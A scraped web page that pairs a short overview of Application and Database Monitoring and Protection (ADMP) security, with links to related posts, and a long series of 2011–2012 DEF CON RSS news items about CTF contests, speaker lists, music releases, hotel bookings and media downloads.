Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also defocuses from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data.

ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is:

Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity.

Papers and Posts
------------

1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2.
2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection.
3. What is my motivation, or Why Are We Talking About ADMP.
4. ADMP and Assessment: Linking preventative and detective technologies.
5. ADMP: A Policy Driven Example.
6. Web Application Security: We Need Web Application Firewalls to Work. Better.
7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation.

Presentations
---------

* Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle.

Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

==> CTF Call for Organizers Reminder

https://www.defcon.org/defconrss.xml Does your group have what it takes to be the new DEF CON Capture the Flag Organizers? There are still a couple of months left to apply, the call ends Feb 28, 2013. Instructions on how to apply at: https://forum.defcon.org/showthread.php?t=13160

==> Cyber Monday Sale at Hackerstickers.com!

https://www.defcon.org/defconrss.xml DEF CON & Cyber Monday Sale - Check out the special savings (Up to 60% OFF) site-wide on HackerStickers.com! Use coupon code 'FREESTICK' for free sticker with purchase!

==> DEF CON 20 P2P Collections of Speeches!

https://www.defcon.org/defconrss.xml Happy Turkey Day! As a special Thanksgiving treat, we have posted eMule Collections and Torrents of the complete Audio and Slides Video Collections from DEF CON 20! You can find the links at https://media.defcon.org/index.html#dc20. Leech away and give thanks for all that hacking goodness!

==> DEF CON 20 Slides Video and Audio is Live!

https://www.defcon.org/defconrss.xml The long-awaited moment has arrived, and you can now grab all of the DEF CON 20 Video (slides only) and Audio presentations from the DEF CON 20 Archive page! We have also posted a Slides Video RSS and an Audio RSS for those who prefer to grab them that way! We will soon be posting Torrent and eMule links for the complete collections at media.defcon.org Enjoy!

==> Call for CTF Organizers!

https://www.defcon.org/defconrss.xml The call for new DEF CON Capture the Flag organizers is live on the forums! Does your group have what it takes to carry the torch with the infamous DEF CON CTF? https://forum.defcon.org/showthread.php?t=13160

==> DEF CON 20 Artwork for Download!

https://www.defcon.org/defconrss.xml If you enjoyed the artwork at DEF CON 20 on the floors, signs, swag and elsewhere, we have put together a little package for you! It contains high res jpg files and is free for personal, non-commercial use! Print it out for your walls, make some computer wallpapers and enjoy! You can find it at: DEF CON 20 Hacking Conference Art (Zip file) Keep an eye out for more art from past DEF CONs in the future!

==> DEF CON 20 Hacker Pyramid and Hacker Jeopardy Video!

https://www.defcon.org/defconrss.xml We now have, for your viewing delight, video from Hacker Jeopardy and 10k Hacker Pyramid at DEF CON 20! This year's Hacker Jeopardy was Winn's last, so check out all the surprises he had in store! Enjoy!

Hacker Jeopardy: eMule | Torrent
Hacker Pyramid: eMule | Torrent

You can also download them individually:
* DEF CON 20 Hacking Conference - Hacker Jeopardy 1
* DEF CON 20 Hacking Conference - Hacker Jeopardy 2
* DEF CON 20 Hacking Conference - Hacker Jeopardy 3
* DEF CON 20 Hacking Conference - Hacker Jeopardy Final
* DEF CON 20 Hacking Conference - Hacker Pyramid 1
* DEF CON 20 Hacking Conference - Hacker Pyramid 2

==> DEF CON 20 Updated DVD!

https://www.defcon.org/defconrss.xml We've updated the DEF CON 20 DVD with some extra stuff! Updated presentation materials are now on the DVD image, as well as badge firmware, and the missing textfiles in the Extra Bonus Features section! Direct Download (4.5GB)

==> DEF CON 20 SE CTF Report!

https://www.defcon.org/defconrss.xml Social-engineer.org has released a detailed report of the findings from DEF CON 20 Social Engineering CTF Battle of the SExes! http://www.social-engineer.org/?p=3106

==> Tamper Evident MacGyvers!

https://www.defcon.org/defconrss.xml The following YouTube video is a pretty awesome show of ingenuity, by one of the Tamper Evident Contest teams in the MacGyver category at DEF CON 20. Using only items in their hotel room, they attempt to defeat a number of tamper evident devices. Enjoy! http://www.youtube.com/watch?v=MUzPwXPzfHQ

==> DEF CON Behind the Scenes: Zebbler Encanti Decor!

https://www.defcon.org/defconrss.xml Cool video on the making of DEF CON 20 decor for the music events! http://vimeo.com/49428863

==> CTF Archives updated for DEF CON 20!

https://www.defcon.org/defconrss.xml Capture the Flag at DEF CON is a legendary contest of hacking skill, and has grown considerably over the past few years. 20 teams competed for the coveted title this year, and we've updated our CTF Archive page to include as many write-ups from the competition and qualification rounds as we could find. We've also included torrents of the raw pcaps and system image from the DEF CON 20 CTF team ACME PHARM on media.defcon.org, courtesy of @phaktor! These resources and write-ups are meant to not only preserve CTF history, but allow you to dig in and see what the contest is all about! Enjoy!

==> DEF CON 20 Music Compilation Release!

https://www.defcon.org/defconrss.xml Those that were at DEF CON 20 received a music CD along with the Con DVD. This music compilation featured incredible tracks by some extremely talented artists, written especially for this year's show. We have now teamed up with Gravitas recordings to release the music comp as a digital download for free, or pay what you want, with all proceeds to benefit the EFF! Here is the Press release from Gravitas:

For Immediate Release
Contact: John@40HzMedia.com [mailto:John@40HzMedia.com]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Gravitas Presents DEF CON Compilation Free Download ft. Mochipet, MC Frontalot, Minibosses, Cryptex, and more!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File Under: Electronic / Rap / Glitch Hop
Release Date: August 2nd, 2012
Downloadable MP3s: Please feel free to

Various Artists - DEF CON XX Compilation

DEF CON, one of the world's largest and longest running hacking conferences, celebrates its 20th year with an energetic and appropriately themed compilation, entitled "XX". Founder and head of the conference Jeff Moss, also known as Dark Tangent, tasked DEF CON "goon" and Muti Music artist Great Scott with curating the talent filled track selections; acknowledging that music can be pure hacker fuel. Glitch-hop producers AMB, Mochipet and Cryptex play alongside a myriad of other genre-gurus - including nerd-rockers Minibosses, tech-electro wizard High Sage, and nerdcore rap professionals MC Frontalot and Dual Core. Listening to this mix of hacker artists is like riding a wave of concentration as you find yourself zoning out to the ambient tones or letting the determining beats direct your fingers across the keyboard.

One hundred percent of the proceeds from the sales go to the Electronic Frontier Foundation, a non-profit agency that advocates digital rights and fights for the first amendment against egregious government bills like SOPA and the Cybersecurity Act of 2012. We urge you to purchase the DEF CON XX Compilation and spread the word to your friends and family.

Release artwork by DEF CON resident artist: Neil Kronenberg.

Tracklist:
1. AMB - On the Run
2. Minibosses - Sports!!!
3. Dale Chase - SSH to Your Heart featuring Shannon Morse
4. Zebbler Encanti Experience - Data Mind
5. MC Frontalot - Secrets From the Future (Crimson Death Remix)
6. Mochipet - Domo's Bass Station
7. ytcracker - Hacker War
8. Great Scott - gr33tz
9. Royal Sapien - In Chicago in the Time of the Fair (Royal Sapien fork for DEF CON XX)
10. REGENERATOR - Slave (DEF CON Discipline Mix by Mach)
11. Dual Core - Fear and Chaos
12. Cryptex - Error
13. High Sage featuring Katy Rokit - Stuck on Ceazar's Challenge (KEW QEIMYUK QEIMYUK QEIM AYM)
14. bil bless - grimjaw (the hunt for the)

Cover Art: http://40hzmedia.com/images/dc20-album-art.jpg

Links:
http://gravitasrecordings.com/
https://www.facebook.com/gravitasrecordings
http://www.defcon.org/

Download/Stream Widgets: http://gravitasrecordings.bandcamp.com/album/DEF CON-xx-compilation

==> Let the Updates Begin!

https://www.defcon.org/defconrss.xml Greetings all! That was quite an event, wasn't it? We here at DEF CON HQ and our staff all around the country and the world are still reeling. Now that we've had a minute to catch our breath, we'll start posting all of the contest results, media, press, and more that have come out of DEF CON 20. Let's start with a round-up of some of the news that came from this year's show. We've also started receiving contest results. Keep an eye peeled for more updates in the coming days and weeks!

==> Thanks, Everybody!

https://www.defcon.org/defconrss.xml DEF CON 20 is winding down, and it's been another great show. Thanks to everyone who took time out of their summer to attend, whether you're an old-timer or someone here for your first time. It takes a lot of dedicated people to pull off an event of this magnitude, and I want to take a moment to officially thank the crew that made this for you. Show 'em a little love - there's no better team anywhere.

==> DEF CON 20 Entertainment Schedule is Now Live!

https://www.defcon.org/defconrss.xml Dope beats are essential to a healthy immune system and a sparkly brain. FACT. Information retention is vastly increased by combining DJ sets with contained bodies of cool, chlorinated water. FACT. The entertainment schedule for DEF CON 20 is up for your perusal, and it's pretty packed. There are tons of bands, DJs and even an area to just chill and rest your weary neocortex. Music until the wee hours, from Thursday through Sunday. You can check out Minibosses, or Frontalot, or REGENERATOR or Mochipet. It's like one of those outdoor music festivals, but with enough sense to come inside. Face it. Where else do you get to see Keith Myers versus Zack Fasel in a battle of hacker DJs? Or a band composed entirely of DEF CON Goons? Or the ever-awesome Miss DJ Jackalope rocking the same party as Crystal Method? As always, planning is key - so go check out the schedule and schedule in your Recommended Daily Allowance of rhythm.

==> DEF CON Swag Has a New Online Home - Welcome Hackerstickers.com!

https://www.defcon.org/defconrss.xml Hackerstickers.com is now the official online retailer of DEF CON merchandise. They carry the whole line, from T-shirts to Zippos. And also stickers. All that and they also carry picksets and a wide variety of caffeine delivery devices. If you're in the market for hacker swag, check out Hackerstickers. Tell 'em DEF CON sent ya.

==> DT's Tamper Evident Contest is Live!

https://www.defcon.org/defconrss.xml The world is full of 'tamper-proof' packaging. You're expected to trust it, but how strong are those measures, really? This is a contest about defeating these physical measures in a documentable, elegant fashion that leaves no trace of your attack. You can enter alone or with a team, and you can even enter the 'Unlimited' class that allows you to use any tools or gear you can get your hands on. Registration is open in the Tamper Evident Signup Forum Thread. To learn the rules and get a feel for the contest, go to the Tamper Evident Contest Thread. Space is limited, so if you think this is a contest for you, get yourself signed up!

==> Short Story Contest Winners!

https://www.defcon.org/defconrss.xml Thanks to everyone who participated in this year's Short Story Contest. It's cool to see how much literary talent is bubbling under the surface of the DEF CON community. This year's winners are:
- People's Choice Winner - DEF CON Unbound by John McNabb
- First Place - A Silent, Private Place by Davien
- Second Place - DEF CON Unbound by John McNabb
- Honorable Mention - DEF CON - The Beginning of the End by Siobahn Morrison
To read the winning stories, and all of the participants, you can head over to the DEF CON Forums Short Story Contest thread. Congratulations to the winners!

==> DEF CON Art Contest Returns!

https://www.defcon.org/defconrss.xml This year's DEF CON art contest is going to be just a little different. First, you'll only have a few weeks to submit your masterpiece. All entries must be submitted by July 6th. That's a lot less lead time, but we're pretty sure pressure sharpens the mind. The theme is also going to be a little different. Since this is DEF CON's 20th anniversary, we're asking for poster-style artwork that imagines DEF CON 20 years from now. What do you think we'll be sharing with each other at DEF CON 40? What will hackery look like in 2032? You're free to share your vision, whether you tend toward kittens and lollipops or brutal post-human hellscapes. We'll share the best pieces with everyone through Facebook and the DEF CON website, and we'll post the winners in a prestigious spot at the con. So don't be shy - fire up your favorite digital artmaker and give your right brain a workout.
Submission Deadline: All submissions must be received by July 6, 2012
Submit entries to: neil [at] defcon dot org
Submission info to include: Real name (your identity must be verifiable to collect a prize) and desired nick/handle if any; and a title and description of your piece.
Additional Specs: Maximum poster size 11"x17". Final entries should be in 300pi minimum .tif or .jpg format. Vector entries can be in .ai or .eps format. Delivery is the responsibility of the entrant; if the entry is too large to email you may post it online for download.
Prizes: Entries will be judged together this year, with prizes for the top three finishers.
1st Place: Two Free admissions to DEF CON 20, and a $200 credit at the DEF CON Swag Booth.
2nd Place: Free admission to DEF CON 20, and a $100 credit at the DEF CON Swag Booth.
3rd Place: Free admission to DEF CON 20, and a $50 credit at the DEF CON Swag Booth.

==> Capture the Packet is Back!

https://www.defcon.org/defconrss.xml "Search Network Traffic, Locate Clues, Solve Puzzles and Score" Capture the Packet returns for a third year, and this time there's a Black Badge up for grabs! You can sign up your team (2 players max), learn the rules and read the FAQ by heading over to the DC20 CTP express sign-up page.

==> CTF Write-up Round-up!

https://www.defcon.org/defconrss.xml As promised, here are some links to write-ups of the past weekend's hot CTF qualification action. The biggest list of links I've seen is at the Deva [Me, Myself and InfoSec] blog. That's a good first stop. A few more links below.
* From the VSzA Techblog, write-ups of the grab bag 300 and urandom 300
* From the Security Black Swan blog, a write-up of b 100, b 200 and urandom 300.
* If you can read Chinese, Insight Labs has a write-up of Forensics 300 and b 300
If you know of an especially good write-up that's not on the list, let us know on Facebook or Twitter.

==> CTF Quals Results Are In!

https://www.defcon.org/defconrss.xml The CTF qualifications are complete, and it's time to announce the victors. The teams listed below have earned your respect and the opportunity to fight it out in Vegas.
# | Score | Team
1 | 4900 | Hates Irony
2 | 4800 | PPP
3 | 4400 | 侍
4 | 4400 | sutegoma2
5 | 4400 | Shellphish
6 | 4400 | TwoSixNine
7 | 4200 | European Nopsled Team (DC 19 winner)
8 | 4100 | More Smoked Leet Chicken
9 | 4100 | our name sucks
10 | 4100 | ACME Pharm
11 | 4100 | WOWHACKER-PLUS
We'll be scouring the Intertubes to bring you write-ups of the action, so watch this space. Thanks to everyone who participated, and congratulations to the winners. The game is afoot.

==> Vote for DC Recognize Awards!

https://www.defcon.org/defconrss.xml DEF CON is proud to announce the 2nd annual DEF CON awards ceremony, renamed the DC Recognize Awards. These awards are given to deserving individuals in the community, industry, and media. For DC20, we've shaken things up and included 7 different categories for your voting pleasure. Nominations will be held online, at SurveyMonkey, until July 10th. From July 11th until the conference, the DEF CON Awards Selection Committee will review all the nominations for validity and evidence. The top group of nominations that meet the nomination criteria, have the best justification, and are generally worthwhile will be presented for voting during the DEF CON Recognize Awards Ceremony at DEF CON. All nominated individuals will be invited to the ceremony to receive their award in person, and provide a short "Thank you!" or "justification". To ensure your nomination is not discarded, include as much vital information as possible for your nomination. Links to stories, articles, media, or other evidence (product information, blogs, etc) should be included. Be sure to attend the DC Recognize Awards Ceremony at DEF CON to vote for your choice in each of the 7 categories! Your hosts again this year will be Jericho, Jeff Moss, and Russ Rogers. You can get your nominations in at the DEF CON Recognize Award Nomination Form!

==> Check Out Our New Vendor Page!

https://www.defcon.org/defconrss.xml The DEF CON Vendor Area never disappoints. There's always an eclectic mix of merchandise to paw through, from cutting-edge reading material to mutant hardware custom-made for the apocalypse. This year we'll be featuring the vendors on a page of their own, so that you can get to know them before the Con. We'll update as the list grows, so keep an eye peeled. Check the DEF CON 20 Vendor Page.

==> Social Engineering CTF Contest for Kids!

https://www.defcon.org/defconrss.xml Running to find the clues... racing to pick the locks, cracking codes, breaking ciphers and frantically fighting against the clock? This is not the theme of the latest Mission Impossible movie. No, this is the theme of the DEF CON 20 Social Engineering Capture the Flag for Kids - Return of the Schmooze. Here is the Cliff's Notes version. If you:
* are 6-16 years of age
* think outside of the box
* enjoy challenges that will test your limits
* want to race the clock to solve mind-bending puzzles
* want to learn how to pick locks, solve ciphers, break code and use social engineering in your everyday life
* enjoy cool prizes
This competition will give you all the tools and instruction you need to learn these skills and many more. Although the contest will challenge you, it will be fun, entertaining and very educational. Then you have no choice: grab your parents, head over to the registration page below and fill out all the details. Then it's time to get your brains ready for RETURN OF THE SCHMOOZE! Register Here, NOW!

==> DEF CON 20 Documentary and Call for DEF CON History!

https://www.defcon.org/defconrss.xml As you may have heard, in honor of our 20th anniversary, we have a DEF CON Documentary in the making by none other than Jason Scott of textfiles.com! Jason has made an announcement about it on his blog at ascii.textfiles.com, so go check out what it's all about! Near the end of the post, he asks for your help finding various pieces of DEF CON history, lore and artifacts. So if you have any of the footage or pictures listed, please help him out!

==> DEF CON 20 Speaker Page is Live! First round posted!

https://www.defcon.org/defconrss.xml The first round of Speakers is now live on the DEF CON 20 Speaker Page for your perusal! Enough said, now go and check 'em out!
* Welcome & Making the DEF CON 20 Badge + Special Presentation by Jason Scott -- The Dark Tangent, LosT, and Jason Scott
* DEF CON 101
* Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director -- Jeremy Zerechak
* Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors -- Joe Kawasaki, Sidney Sherman, and Actors To Be Announced
* Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte -- "MIT Mike" Aponte
* Owning Bad Guys {And Mafia} With Javascript Botnets -- Chema Alonso and Manu "The Sur"
* <ghz or bust: defcon -- atlas
* Overwriting the Exception Handling Cache Pointer - Dwarf Oriented Programming -- Rodrigo Rubira Branco, James Oakley, and Sergey Bratus
* Tenacious Diggity: Skinny Dippin in a Sea of Bing -- Francis Brown and Rob Ragan
* Exploit Archaeology: Raiders of the Lost Payphones -- Josh Brashars
* Panel: Meet the Feds -- Panelists To Be Announced
* Life Inside a Skinner Box: Confronting our Future of Automated Law Enforcement -- Greg Conti, Lisa Shay, and Woody Hartzog
* DEF CON Awards
* Hacking Humanity: Human Augmentation and You -- Christian "quaddi" Dameff, Jeff "r3plicant" Tully
* Sploitego - Maltego's (Local) Partner in Crime -- Nadeem Douba
* Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework -- Egypt
* Post-Exploitation Nirvana: Launching OpenDLP Agents over Meterpreter Sessions -- Andrew Gavin, Michael Baucom, and Charles Smith
* More Projects of Prototype This! -- Joe Grand and Zoz
* Crypto and the Cops: the Law of Key Disclosure and Forced Decryption -- Marcia Hofmann
* Black Ops -- Dan Kaminsky
* Owning One to Rule Them All -- Dave Kennedy and Dave DeSimone
* Detecting Reflective Injection -- Andrew King
* An Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets -- James Kirk
* TBA -- Moxie Marlinspike
* Skype VoIP Software Vulnerabilities: Advanced 0Day Exploitation -- Benjamin Kunz Mejri
* Defcon Comedy Jam V, V for Vendetta -- David Mortman, Rich Mogull, Chris Hoff, Dave Maynor, Larry Pesce, and James Arlen
* Cortana: Rise of the Automated Red Team -- Raphael Mudge
* Panel: The Making of DEF CON 20
* Hacker + Airplanes = No Good Can Come Of This -- RenderMan
* MegaUpload: Guilty or Not Guilty? -- Jim Rennie and Jennifer Granick
* Spy vs. Spy: Spying on Mobile Device Spyware -- Michael Robinson and Chris Taylor
* Bruce Schneier Answers Your Questions -- Bruce Schneier
* Can You Track Me Now? Government And Corporate Surveillance Of Mobile Geo-Location Data -- Christopher Soghoian, Ben Wizner, Catherine Crump, and Ashkan Soltani
* Can Twitter Really Help Expose Psychopath Killer Traits? -- Chris "TheSuggmeister" Sumner
* Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future -- Richard Thieme
* Safes and Containers: Insecurity Design Excellence -- Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis
* TBA -- Paul Vixie

==> Elite Force is Playing DEF CON 20!

https://www.defcon.org/defconrss.xml We have another major addition to the Saturday night DEF CON White Ball music line-up alongside The Crystal Method! DEF-CON is excited to bring renowned breaks+tech-funk act Elite Force to resonate your ears and chest cavity. Recently most well known for his RE:VAMPED series re-working such artists as Aphex Twin, Propellerheads, Meat Katie, Datsik, and many many others, Elite Force has been an established hacker friendly act for years. In fact, you may have heard of him through one of his earlier projects: Lunatic Calm (with the hit song "Leave You Far Behind," featured on movie soundtracks like The Jackal, Mortal Kombat Annihilation, and The Matrix).
Official Website: http://www.eliteforcemusic.com/
Soundcloud: http://soundcloud.com/elite-force
Videos:
1) Elite Force - Society Suicides: http://www.youtube.com/watch?v=nceAGqfdykQ
2) Elite Force - Captain America: http://www.youtube.com/watch?v=vWkJ7nYE0cU
3) Elite Force - Law of Life: http://www.youtube.com/watch?v=oWnjVRobf0w
4) Elite Force - Mainframe Wrekka: http://www.youtube.com/watch?v=z3d6MMp9Gjk
5) Lunatic Calm - Leave You Far Behind: http://www.youtube.com/watch?v=maP6q3D4Hf0

==> DEF CON Extended Room Block at Rio is almost SOLD OUT!

https://www.defcon.org/defconrss.xml Peak nights Friday and Saturday are almost gone. You can still save money and be at Rio by booking the nights available at our discounted rate and then paying the Rio rate for any nights that are no longer available in our Block. When Friday and Saturday are sold out in our block, the Rio rate of 7/27 at $299 and 7/28 at $329 will show up on your reservation. These rates are subject to change based on availability. Or we have rooms at Bally's: starting on May 4th we will have overflow rooms at Bally's. There is a shuttle between Bally's and Rio that runs all day and into the evening. Rates at Bally's are as follows:
Wednesday 7/25 $70.00
Thursday 7/26 $70.00
Friday 7/27 $150.00
Saturday 7/28 $150.00
Sunday 7/29 $70.00
To book at Bally's, use this link: http://www.totalrewards.com/hotel-reservations?propCode=BLV&groupCode=SBDEF2 Or call 1-800-358-8777 and reference group code SBDEF2

==> More Rooms at the Rio!

https://www.defcon.org/defconrss.xml Limited additional room block open at Rio for DEF CON attendees. Save $100.00 per night for the weekend nights!
Wednesday night $138.00
Thursday night $158.00
Friday & Saturday nights $178.00
Act now before they are gone! If you made your reservation during the time our block was filling up and you paid a higher rate for one or more nights, the Rio has already adjusted your rate to the new current / lower rate.

==> Press Registration for DEF CON 20!

https://www.defcon.org/defconrss.xml Journalists! Want to register as press for DEF CON 20? Check out the new Press Registration page for the rules and how you can apply for a press badge at DEF CON!

==> Reminders and New Pre-con Calendar

https://www.defcon.org/defconrss.xml As DEF CON 20 planning revs into high gear, we thought it might be useful to have a central location for important pre-con dates and deadlines. Enter the Pre-con Calendar, a new page for keeping track of just such dates! Have a look, and if you have a contest or event, with deadlines before con, that could use an entry on the calendar, send it to neil {at} defcon }dot{ org. Check back there frequently for new dates! Here are some of the upcoming dates you may want to remember:
* April 15 - Vendor Application Opens
* April 30 - Call for Music Closes
* May 1 - Contest & Event RFI Closes
* May 28 - Call for Papers Closes
* June 1-3 - CTF Quals
* June 8 - Printed Program Materials Due

==> DEF CON 20 CTF Updates!

https://www.defcon.org/defconrss.xml News from the CTF front! The DEF CON 20 CTF Quals were recently announced, and will take place June 1-3, 2012. You can find the details at ddtek.biz! We have another recent qualifying team to announce: team LeetChicken has won the Codegate 2012 YUT Challenge, which automatically qualifies them for DEF CON 20 CTF! Congratulations to them! You can find all kinds of CTF info on the DEF CON 20 CTF Page, and tons of CTF links and write-ups in the CTF Archive!

==> DEF CON 20 Site is Live!

https://www.defcon.org/defconrss.xml If you're looking for a central location for all the latest info on this year's DEF CON, you're in luck! The DEF CON 20 site is now live at https://www.defcon.org/html/defcon-20/dc-20-index.html!

==> 200 for 20

https://www.defcon.org/defconrss.xml We'd like to announce that the price for DEF CON 20 will be $200 USD. What will we do with our ill-gotten gains, you may ask? We're going to make the 20th anniversary of DEF CON one to remember. More special swag, great live music, help for the contests to grow, 20 teams for CTF, special speakers, and numerous other secret stuffs. Believe us when we say it'll be the most epic DEF CON ever! Want to get involved in making DEF CON 20 even more k-rad? Participate on the forums https://forum.defcon.org/

==> The Crystal Method at DEF CON 20!

https://www.defcon.org/defconrss.xml As part of our 20th anniversary celebration, DEF CON is ecstatic to announce the headlining act for our Saturday evening White Ball: The Crystal Method! These guys are pioneers in the electronic music scene, with soundtrack appearances on movies like Spawn, Blade, The Replacement Killers, and many others. Here are some samples to tide you over:
* Drown in the Now feat. Matisyahu
* Comin Back
* Sine Language feat. LMFAO

==> Which Past Shirts Should We Re-print for DEF CON 20?

https://www.defcon.org/defconrss.xml We're thinking of doing a limited run of a few past shirts for sale at DEF CON, but which ones should we do? You can help us decide by checking out the gallery of past shirts on our Facebook page, and then voting for your favorite in our survey also on Facebook, or at: https://www.surveymonkey.com/s/defconshirts

==> Reboot Sneak Preview at DEF CON 20!

https://www.defcon.org/defconrss.xml We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is a peek at the premise from an article on the film: "Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social and political concerns that arise from becoming more and more intertwined with the virtual. In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending zero-hour will bring." We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along with the screening! We'll have more info as this solidifies. If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate as well! Find more info at http://www.rebootfilm.com/scoreboard. Watch the Trailer!

==> Special Music Events at DEF CON 20!

https://www.defcon.org/defconrss.xml Exciting news that is first in a series of many! DEF CON is officially announcing some big musical guests this year, the first of whom is breakcore/glitch/hip-hop all-star Mochipet! You'll be able to catch him at the DEF CON 20 official opening Thursday night pool party! Here are a few examples of Mochipet in action: Whomp-a-saurus bleep Mochipet Godzilla New Year Video by Savage Henry A Milli Girls - Mochipet (pseudo-NSFW)

==> CODE 2600 Showing at DEF CON 20!

https://www.defcon.org/defconrss.xml DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. Like the CODE 2600 Facebook page for more info! About the film: CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught in the grips of a global technology takeover.
The Cast:
* Bruce Schneier, Chief Security Technology Officer, BT
* Jeff Moss, Founder Def Con and Black Hat
* Marcus Ranum, Chief Security Officer, Tenable Security
* Jennifer Granick, Civil Liberties Director, EFF
* Dr. Bob Lash, Original Member of the Homebrew Computer Club
* Eric Michaud, Founder, Pumping Station One
* Gideon Lenkey, Security, CEO RA Security Systems
* Lorrie Cranor, Cylab, Carnegie Mellon University
* Phil Lapsley, Phone Phreaking Expert, Author
* Robert Vamosi, Computer Security Journalist, Author
* Wallace Wang, Author, "Steal This Computer Book"

==> DEF CON 20 Contest & Events!

https://www.defcon.org/defconrss.xml We wanted to take a minute and point out some of the buzz around contests and events that are brewing on the DEF CON Forums and elsewhere. As you know, the LosT @ Con Mystery Challenge will be returning for DEF CON 20, and it looks like LosT may or may not already be seeding clues on Twitter (@1o57). The Unofficial DEF CON Shoot is looking pretty active in the planning stages. Other contests and events that have active forums are:
* 10,000 Hacker Pyramid
* Capture the Flag
* Project 2
* Scavenger Hunt
* Schemaverse
* DEF CON 101
* Goon Band
* Hardware Hacking Village
* Skytalks
* Wireless Village
* HackBus
* Toxic BBQ
So head over to the Forums and see what's up! You can also keep up with all the updates as they occur on the DEF CON Twitter, The DEF CON RSS Feed, and the DEF CON Facebook Page!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml We have a brand spanking new Speaker's Corner for you, where Nikita gives her speaker liaison insight into what makes your CFP submission stand out! A must read for the aspiring or seasoned DEF CON submitter!

==> DEF CON 20 Contest & Event RFI

https://www.defcon.org/defconrss.xml The DEF CON 20 Contest & Event Request for Information is live! If you already run or want to run a contest or event at DEF CON 20, it's where to find all of the info you need to get your contest or event on the map! Check it out at: https://www.defcon.org/html/defcon-20/dc-20-contest-rfi.html

==> Book a Room at the Rio for DEF CON 20!

https://www.defcon.org/defconrss.xml You can now book a room at the Rio for DEF CON 20 at our group rate! Do this one of two ways: Go to http://www.totalrewards.com/hotel-reservations?propCode=RLV&groupCode=SRDEF12, or call the hotel directly at 888-746-6955 and reference group code SRDEF12. The nightly rates are split up as follows:
7/22 through 7/26 is $104
7/27 and 7/28 is $118
Then 7/29 through 7/31 is again $104
Get on it soon! Space is limited!

==> The DEF CON 20 Call for Papers is Open!

https://www.defcon.org/defconrss.xml It's time again, friends, for the DEF CON Call for Papers to Open! Read the CFP announcement and fill out the CFP form to have the chance to present your ninja research at DEF CON's 20th Anniversary!

==> DC20 CTF Announcement!

https://www.defcon.org/defconrss.xml Exciting news regarding the Capture the Flag Competition at DEF CON 20! Check out the announcement here.

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Paul Renda discusses the elements of what could make a successful doomsday worm in this new Speaker's Corner entitled "A Prima On An Internet Doomsday Worm."

==> Merry Christmas from DEF CON! Here's a Special Gift!

https://www.defcon.org/defconrss.xml It seems Santa has been in our servers (I don't know how he does it, he must be 1337) and has left you a special gift! The Speaker & Slides video, as well as the Audio from DEF CON 19, is now live and awaiting your downloading pleasure. You can find them on the DEF CON 19 Archive page, or on the following RSS Feeds:
https://www.defcon.org/podcast/defcon-19-video.rss
https://www.defcon.org/podcast/defcon-19-audio.rss
As 2011 winds down, we're working hard behind the scenes for a spectacular 20th anniversary of DEF CON in 2012! So keep your eyes on the DEF CON Facebook, Twitter, RSS Feed, or defcon.org for all the info as it happens! Enjoy!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml We'd like to welcome the following new groups to the DCG fold!
Domestic
* DC317 - Indianapolis, IN
* DC614 - Columbus, OH
* DC765 - Lafayette, IN
* DC909 - Pomona, CA
International
* DC00497151 - Stuttgart, Germany
* DC00977 - Lalitpur, India
* DC02139 - Kiev, Ukraine
* DC110006 - Delhi, India
* DC15033 - Casale Monferrato, Italy
* DC560001 - Bengaluru, India
* DC636 - Mexicali, Baja California, Mexico
* DC700077 - Kolkata, West Bengal, India
* DC880 - Dhaka, Bangladesh
* DC91022 - Mumbai, India
* DC91361 - Guwahati, India
You can find out more about DEF CON Groups on the DCG FAQ, or follow DCG happenings on Facebook!

==> Christmas Deal on DEF CON 19 DVD Sets From TSOK!

https://www.defcon.org/defconrss.xml If you're looking for the perfect Hacker gift, you can purchase the full DVD sets from DEF CON 19 from The Source of Knowledge at discounted prices up through Christmas Eve!

==> Hacker Jeopardy, Hacker Pyramid and Closing Ceremonies Video!

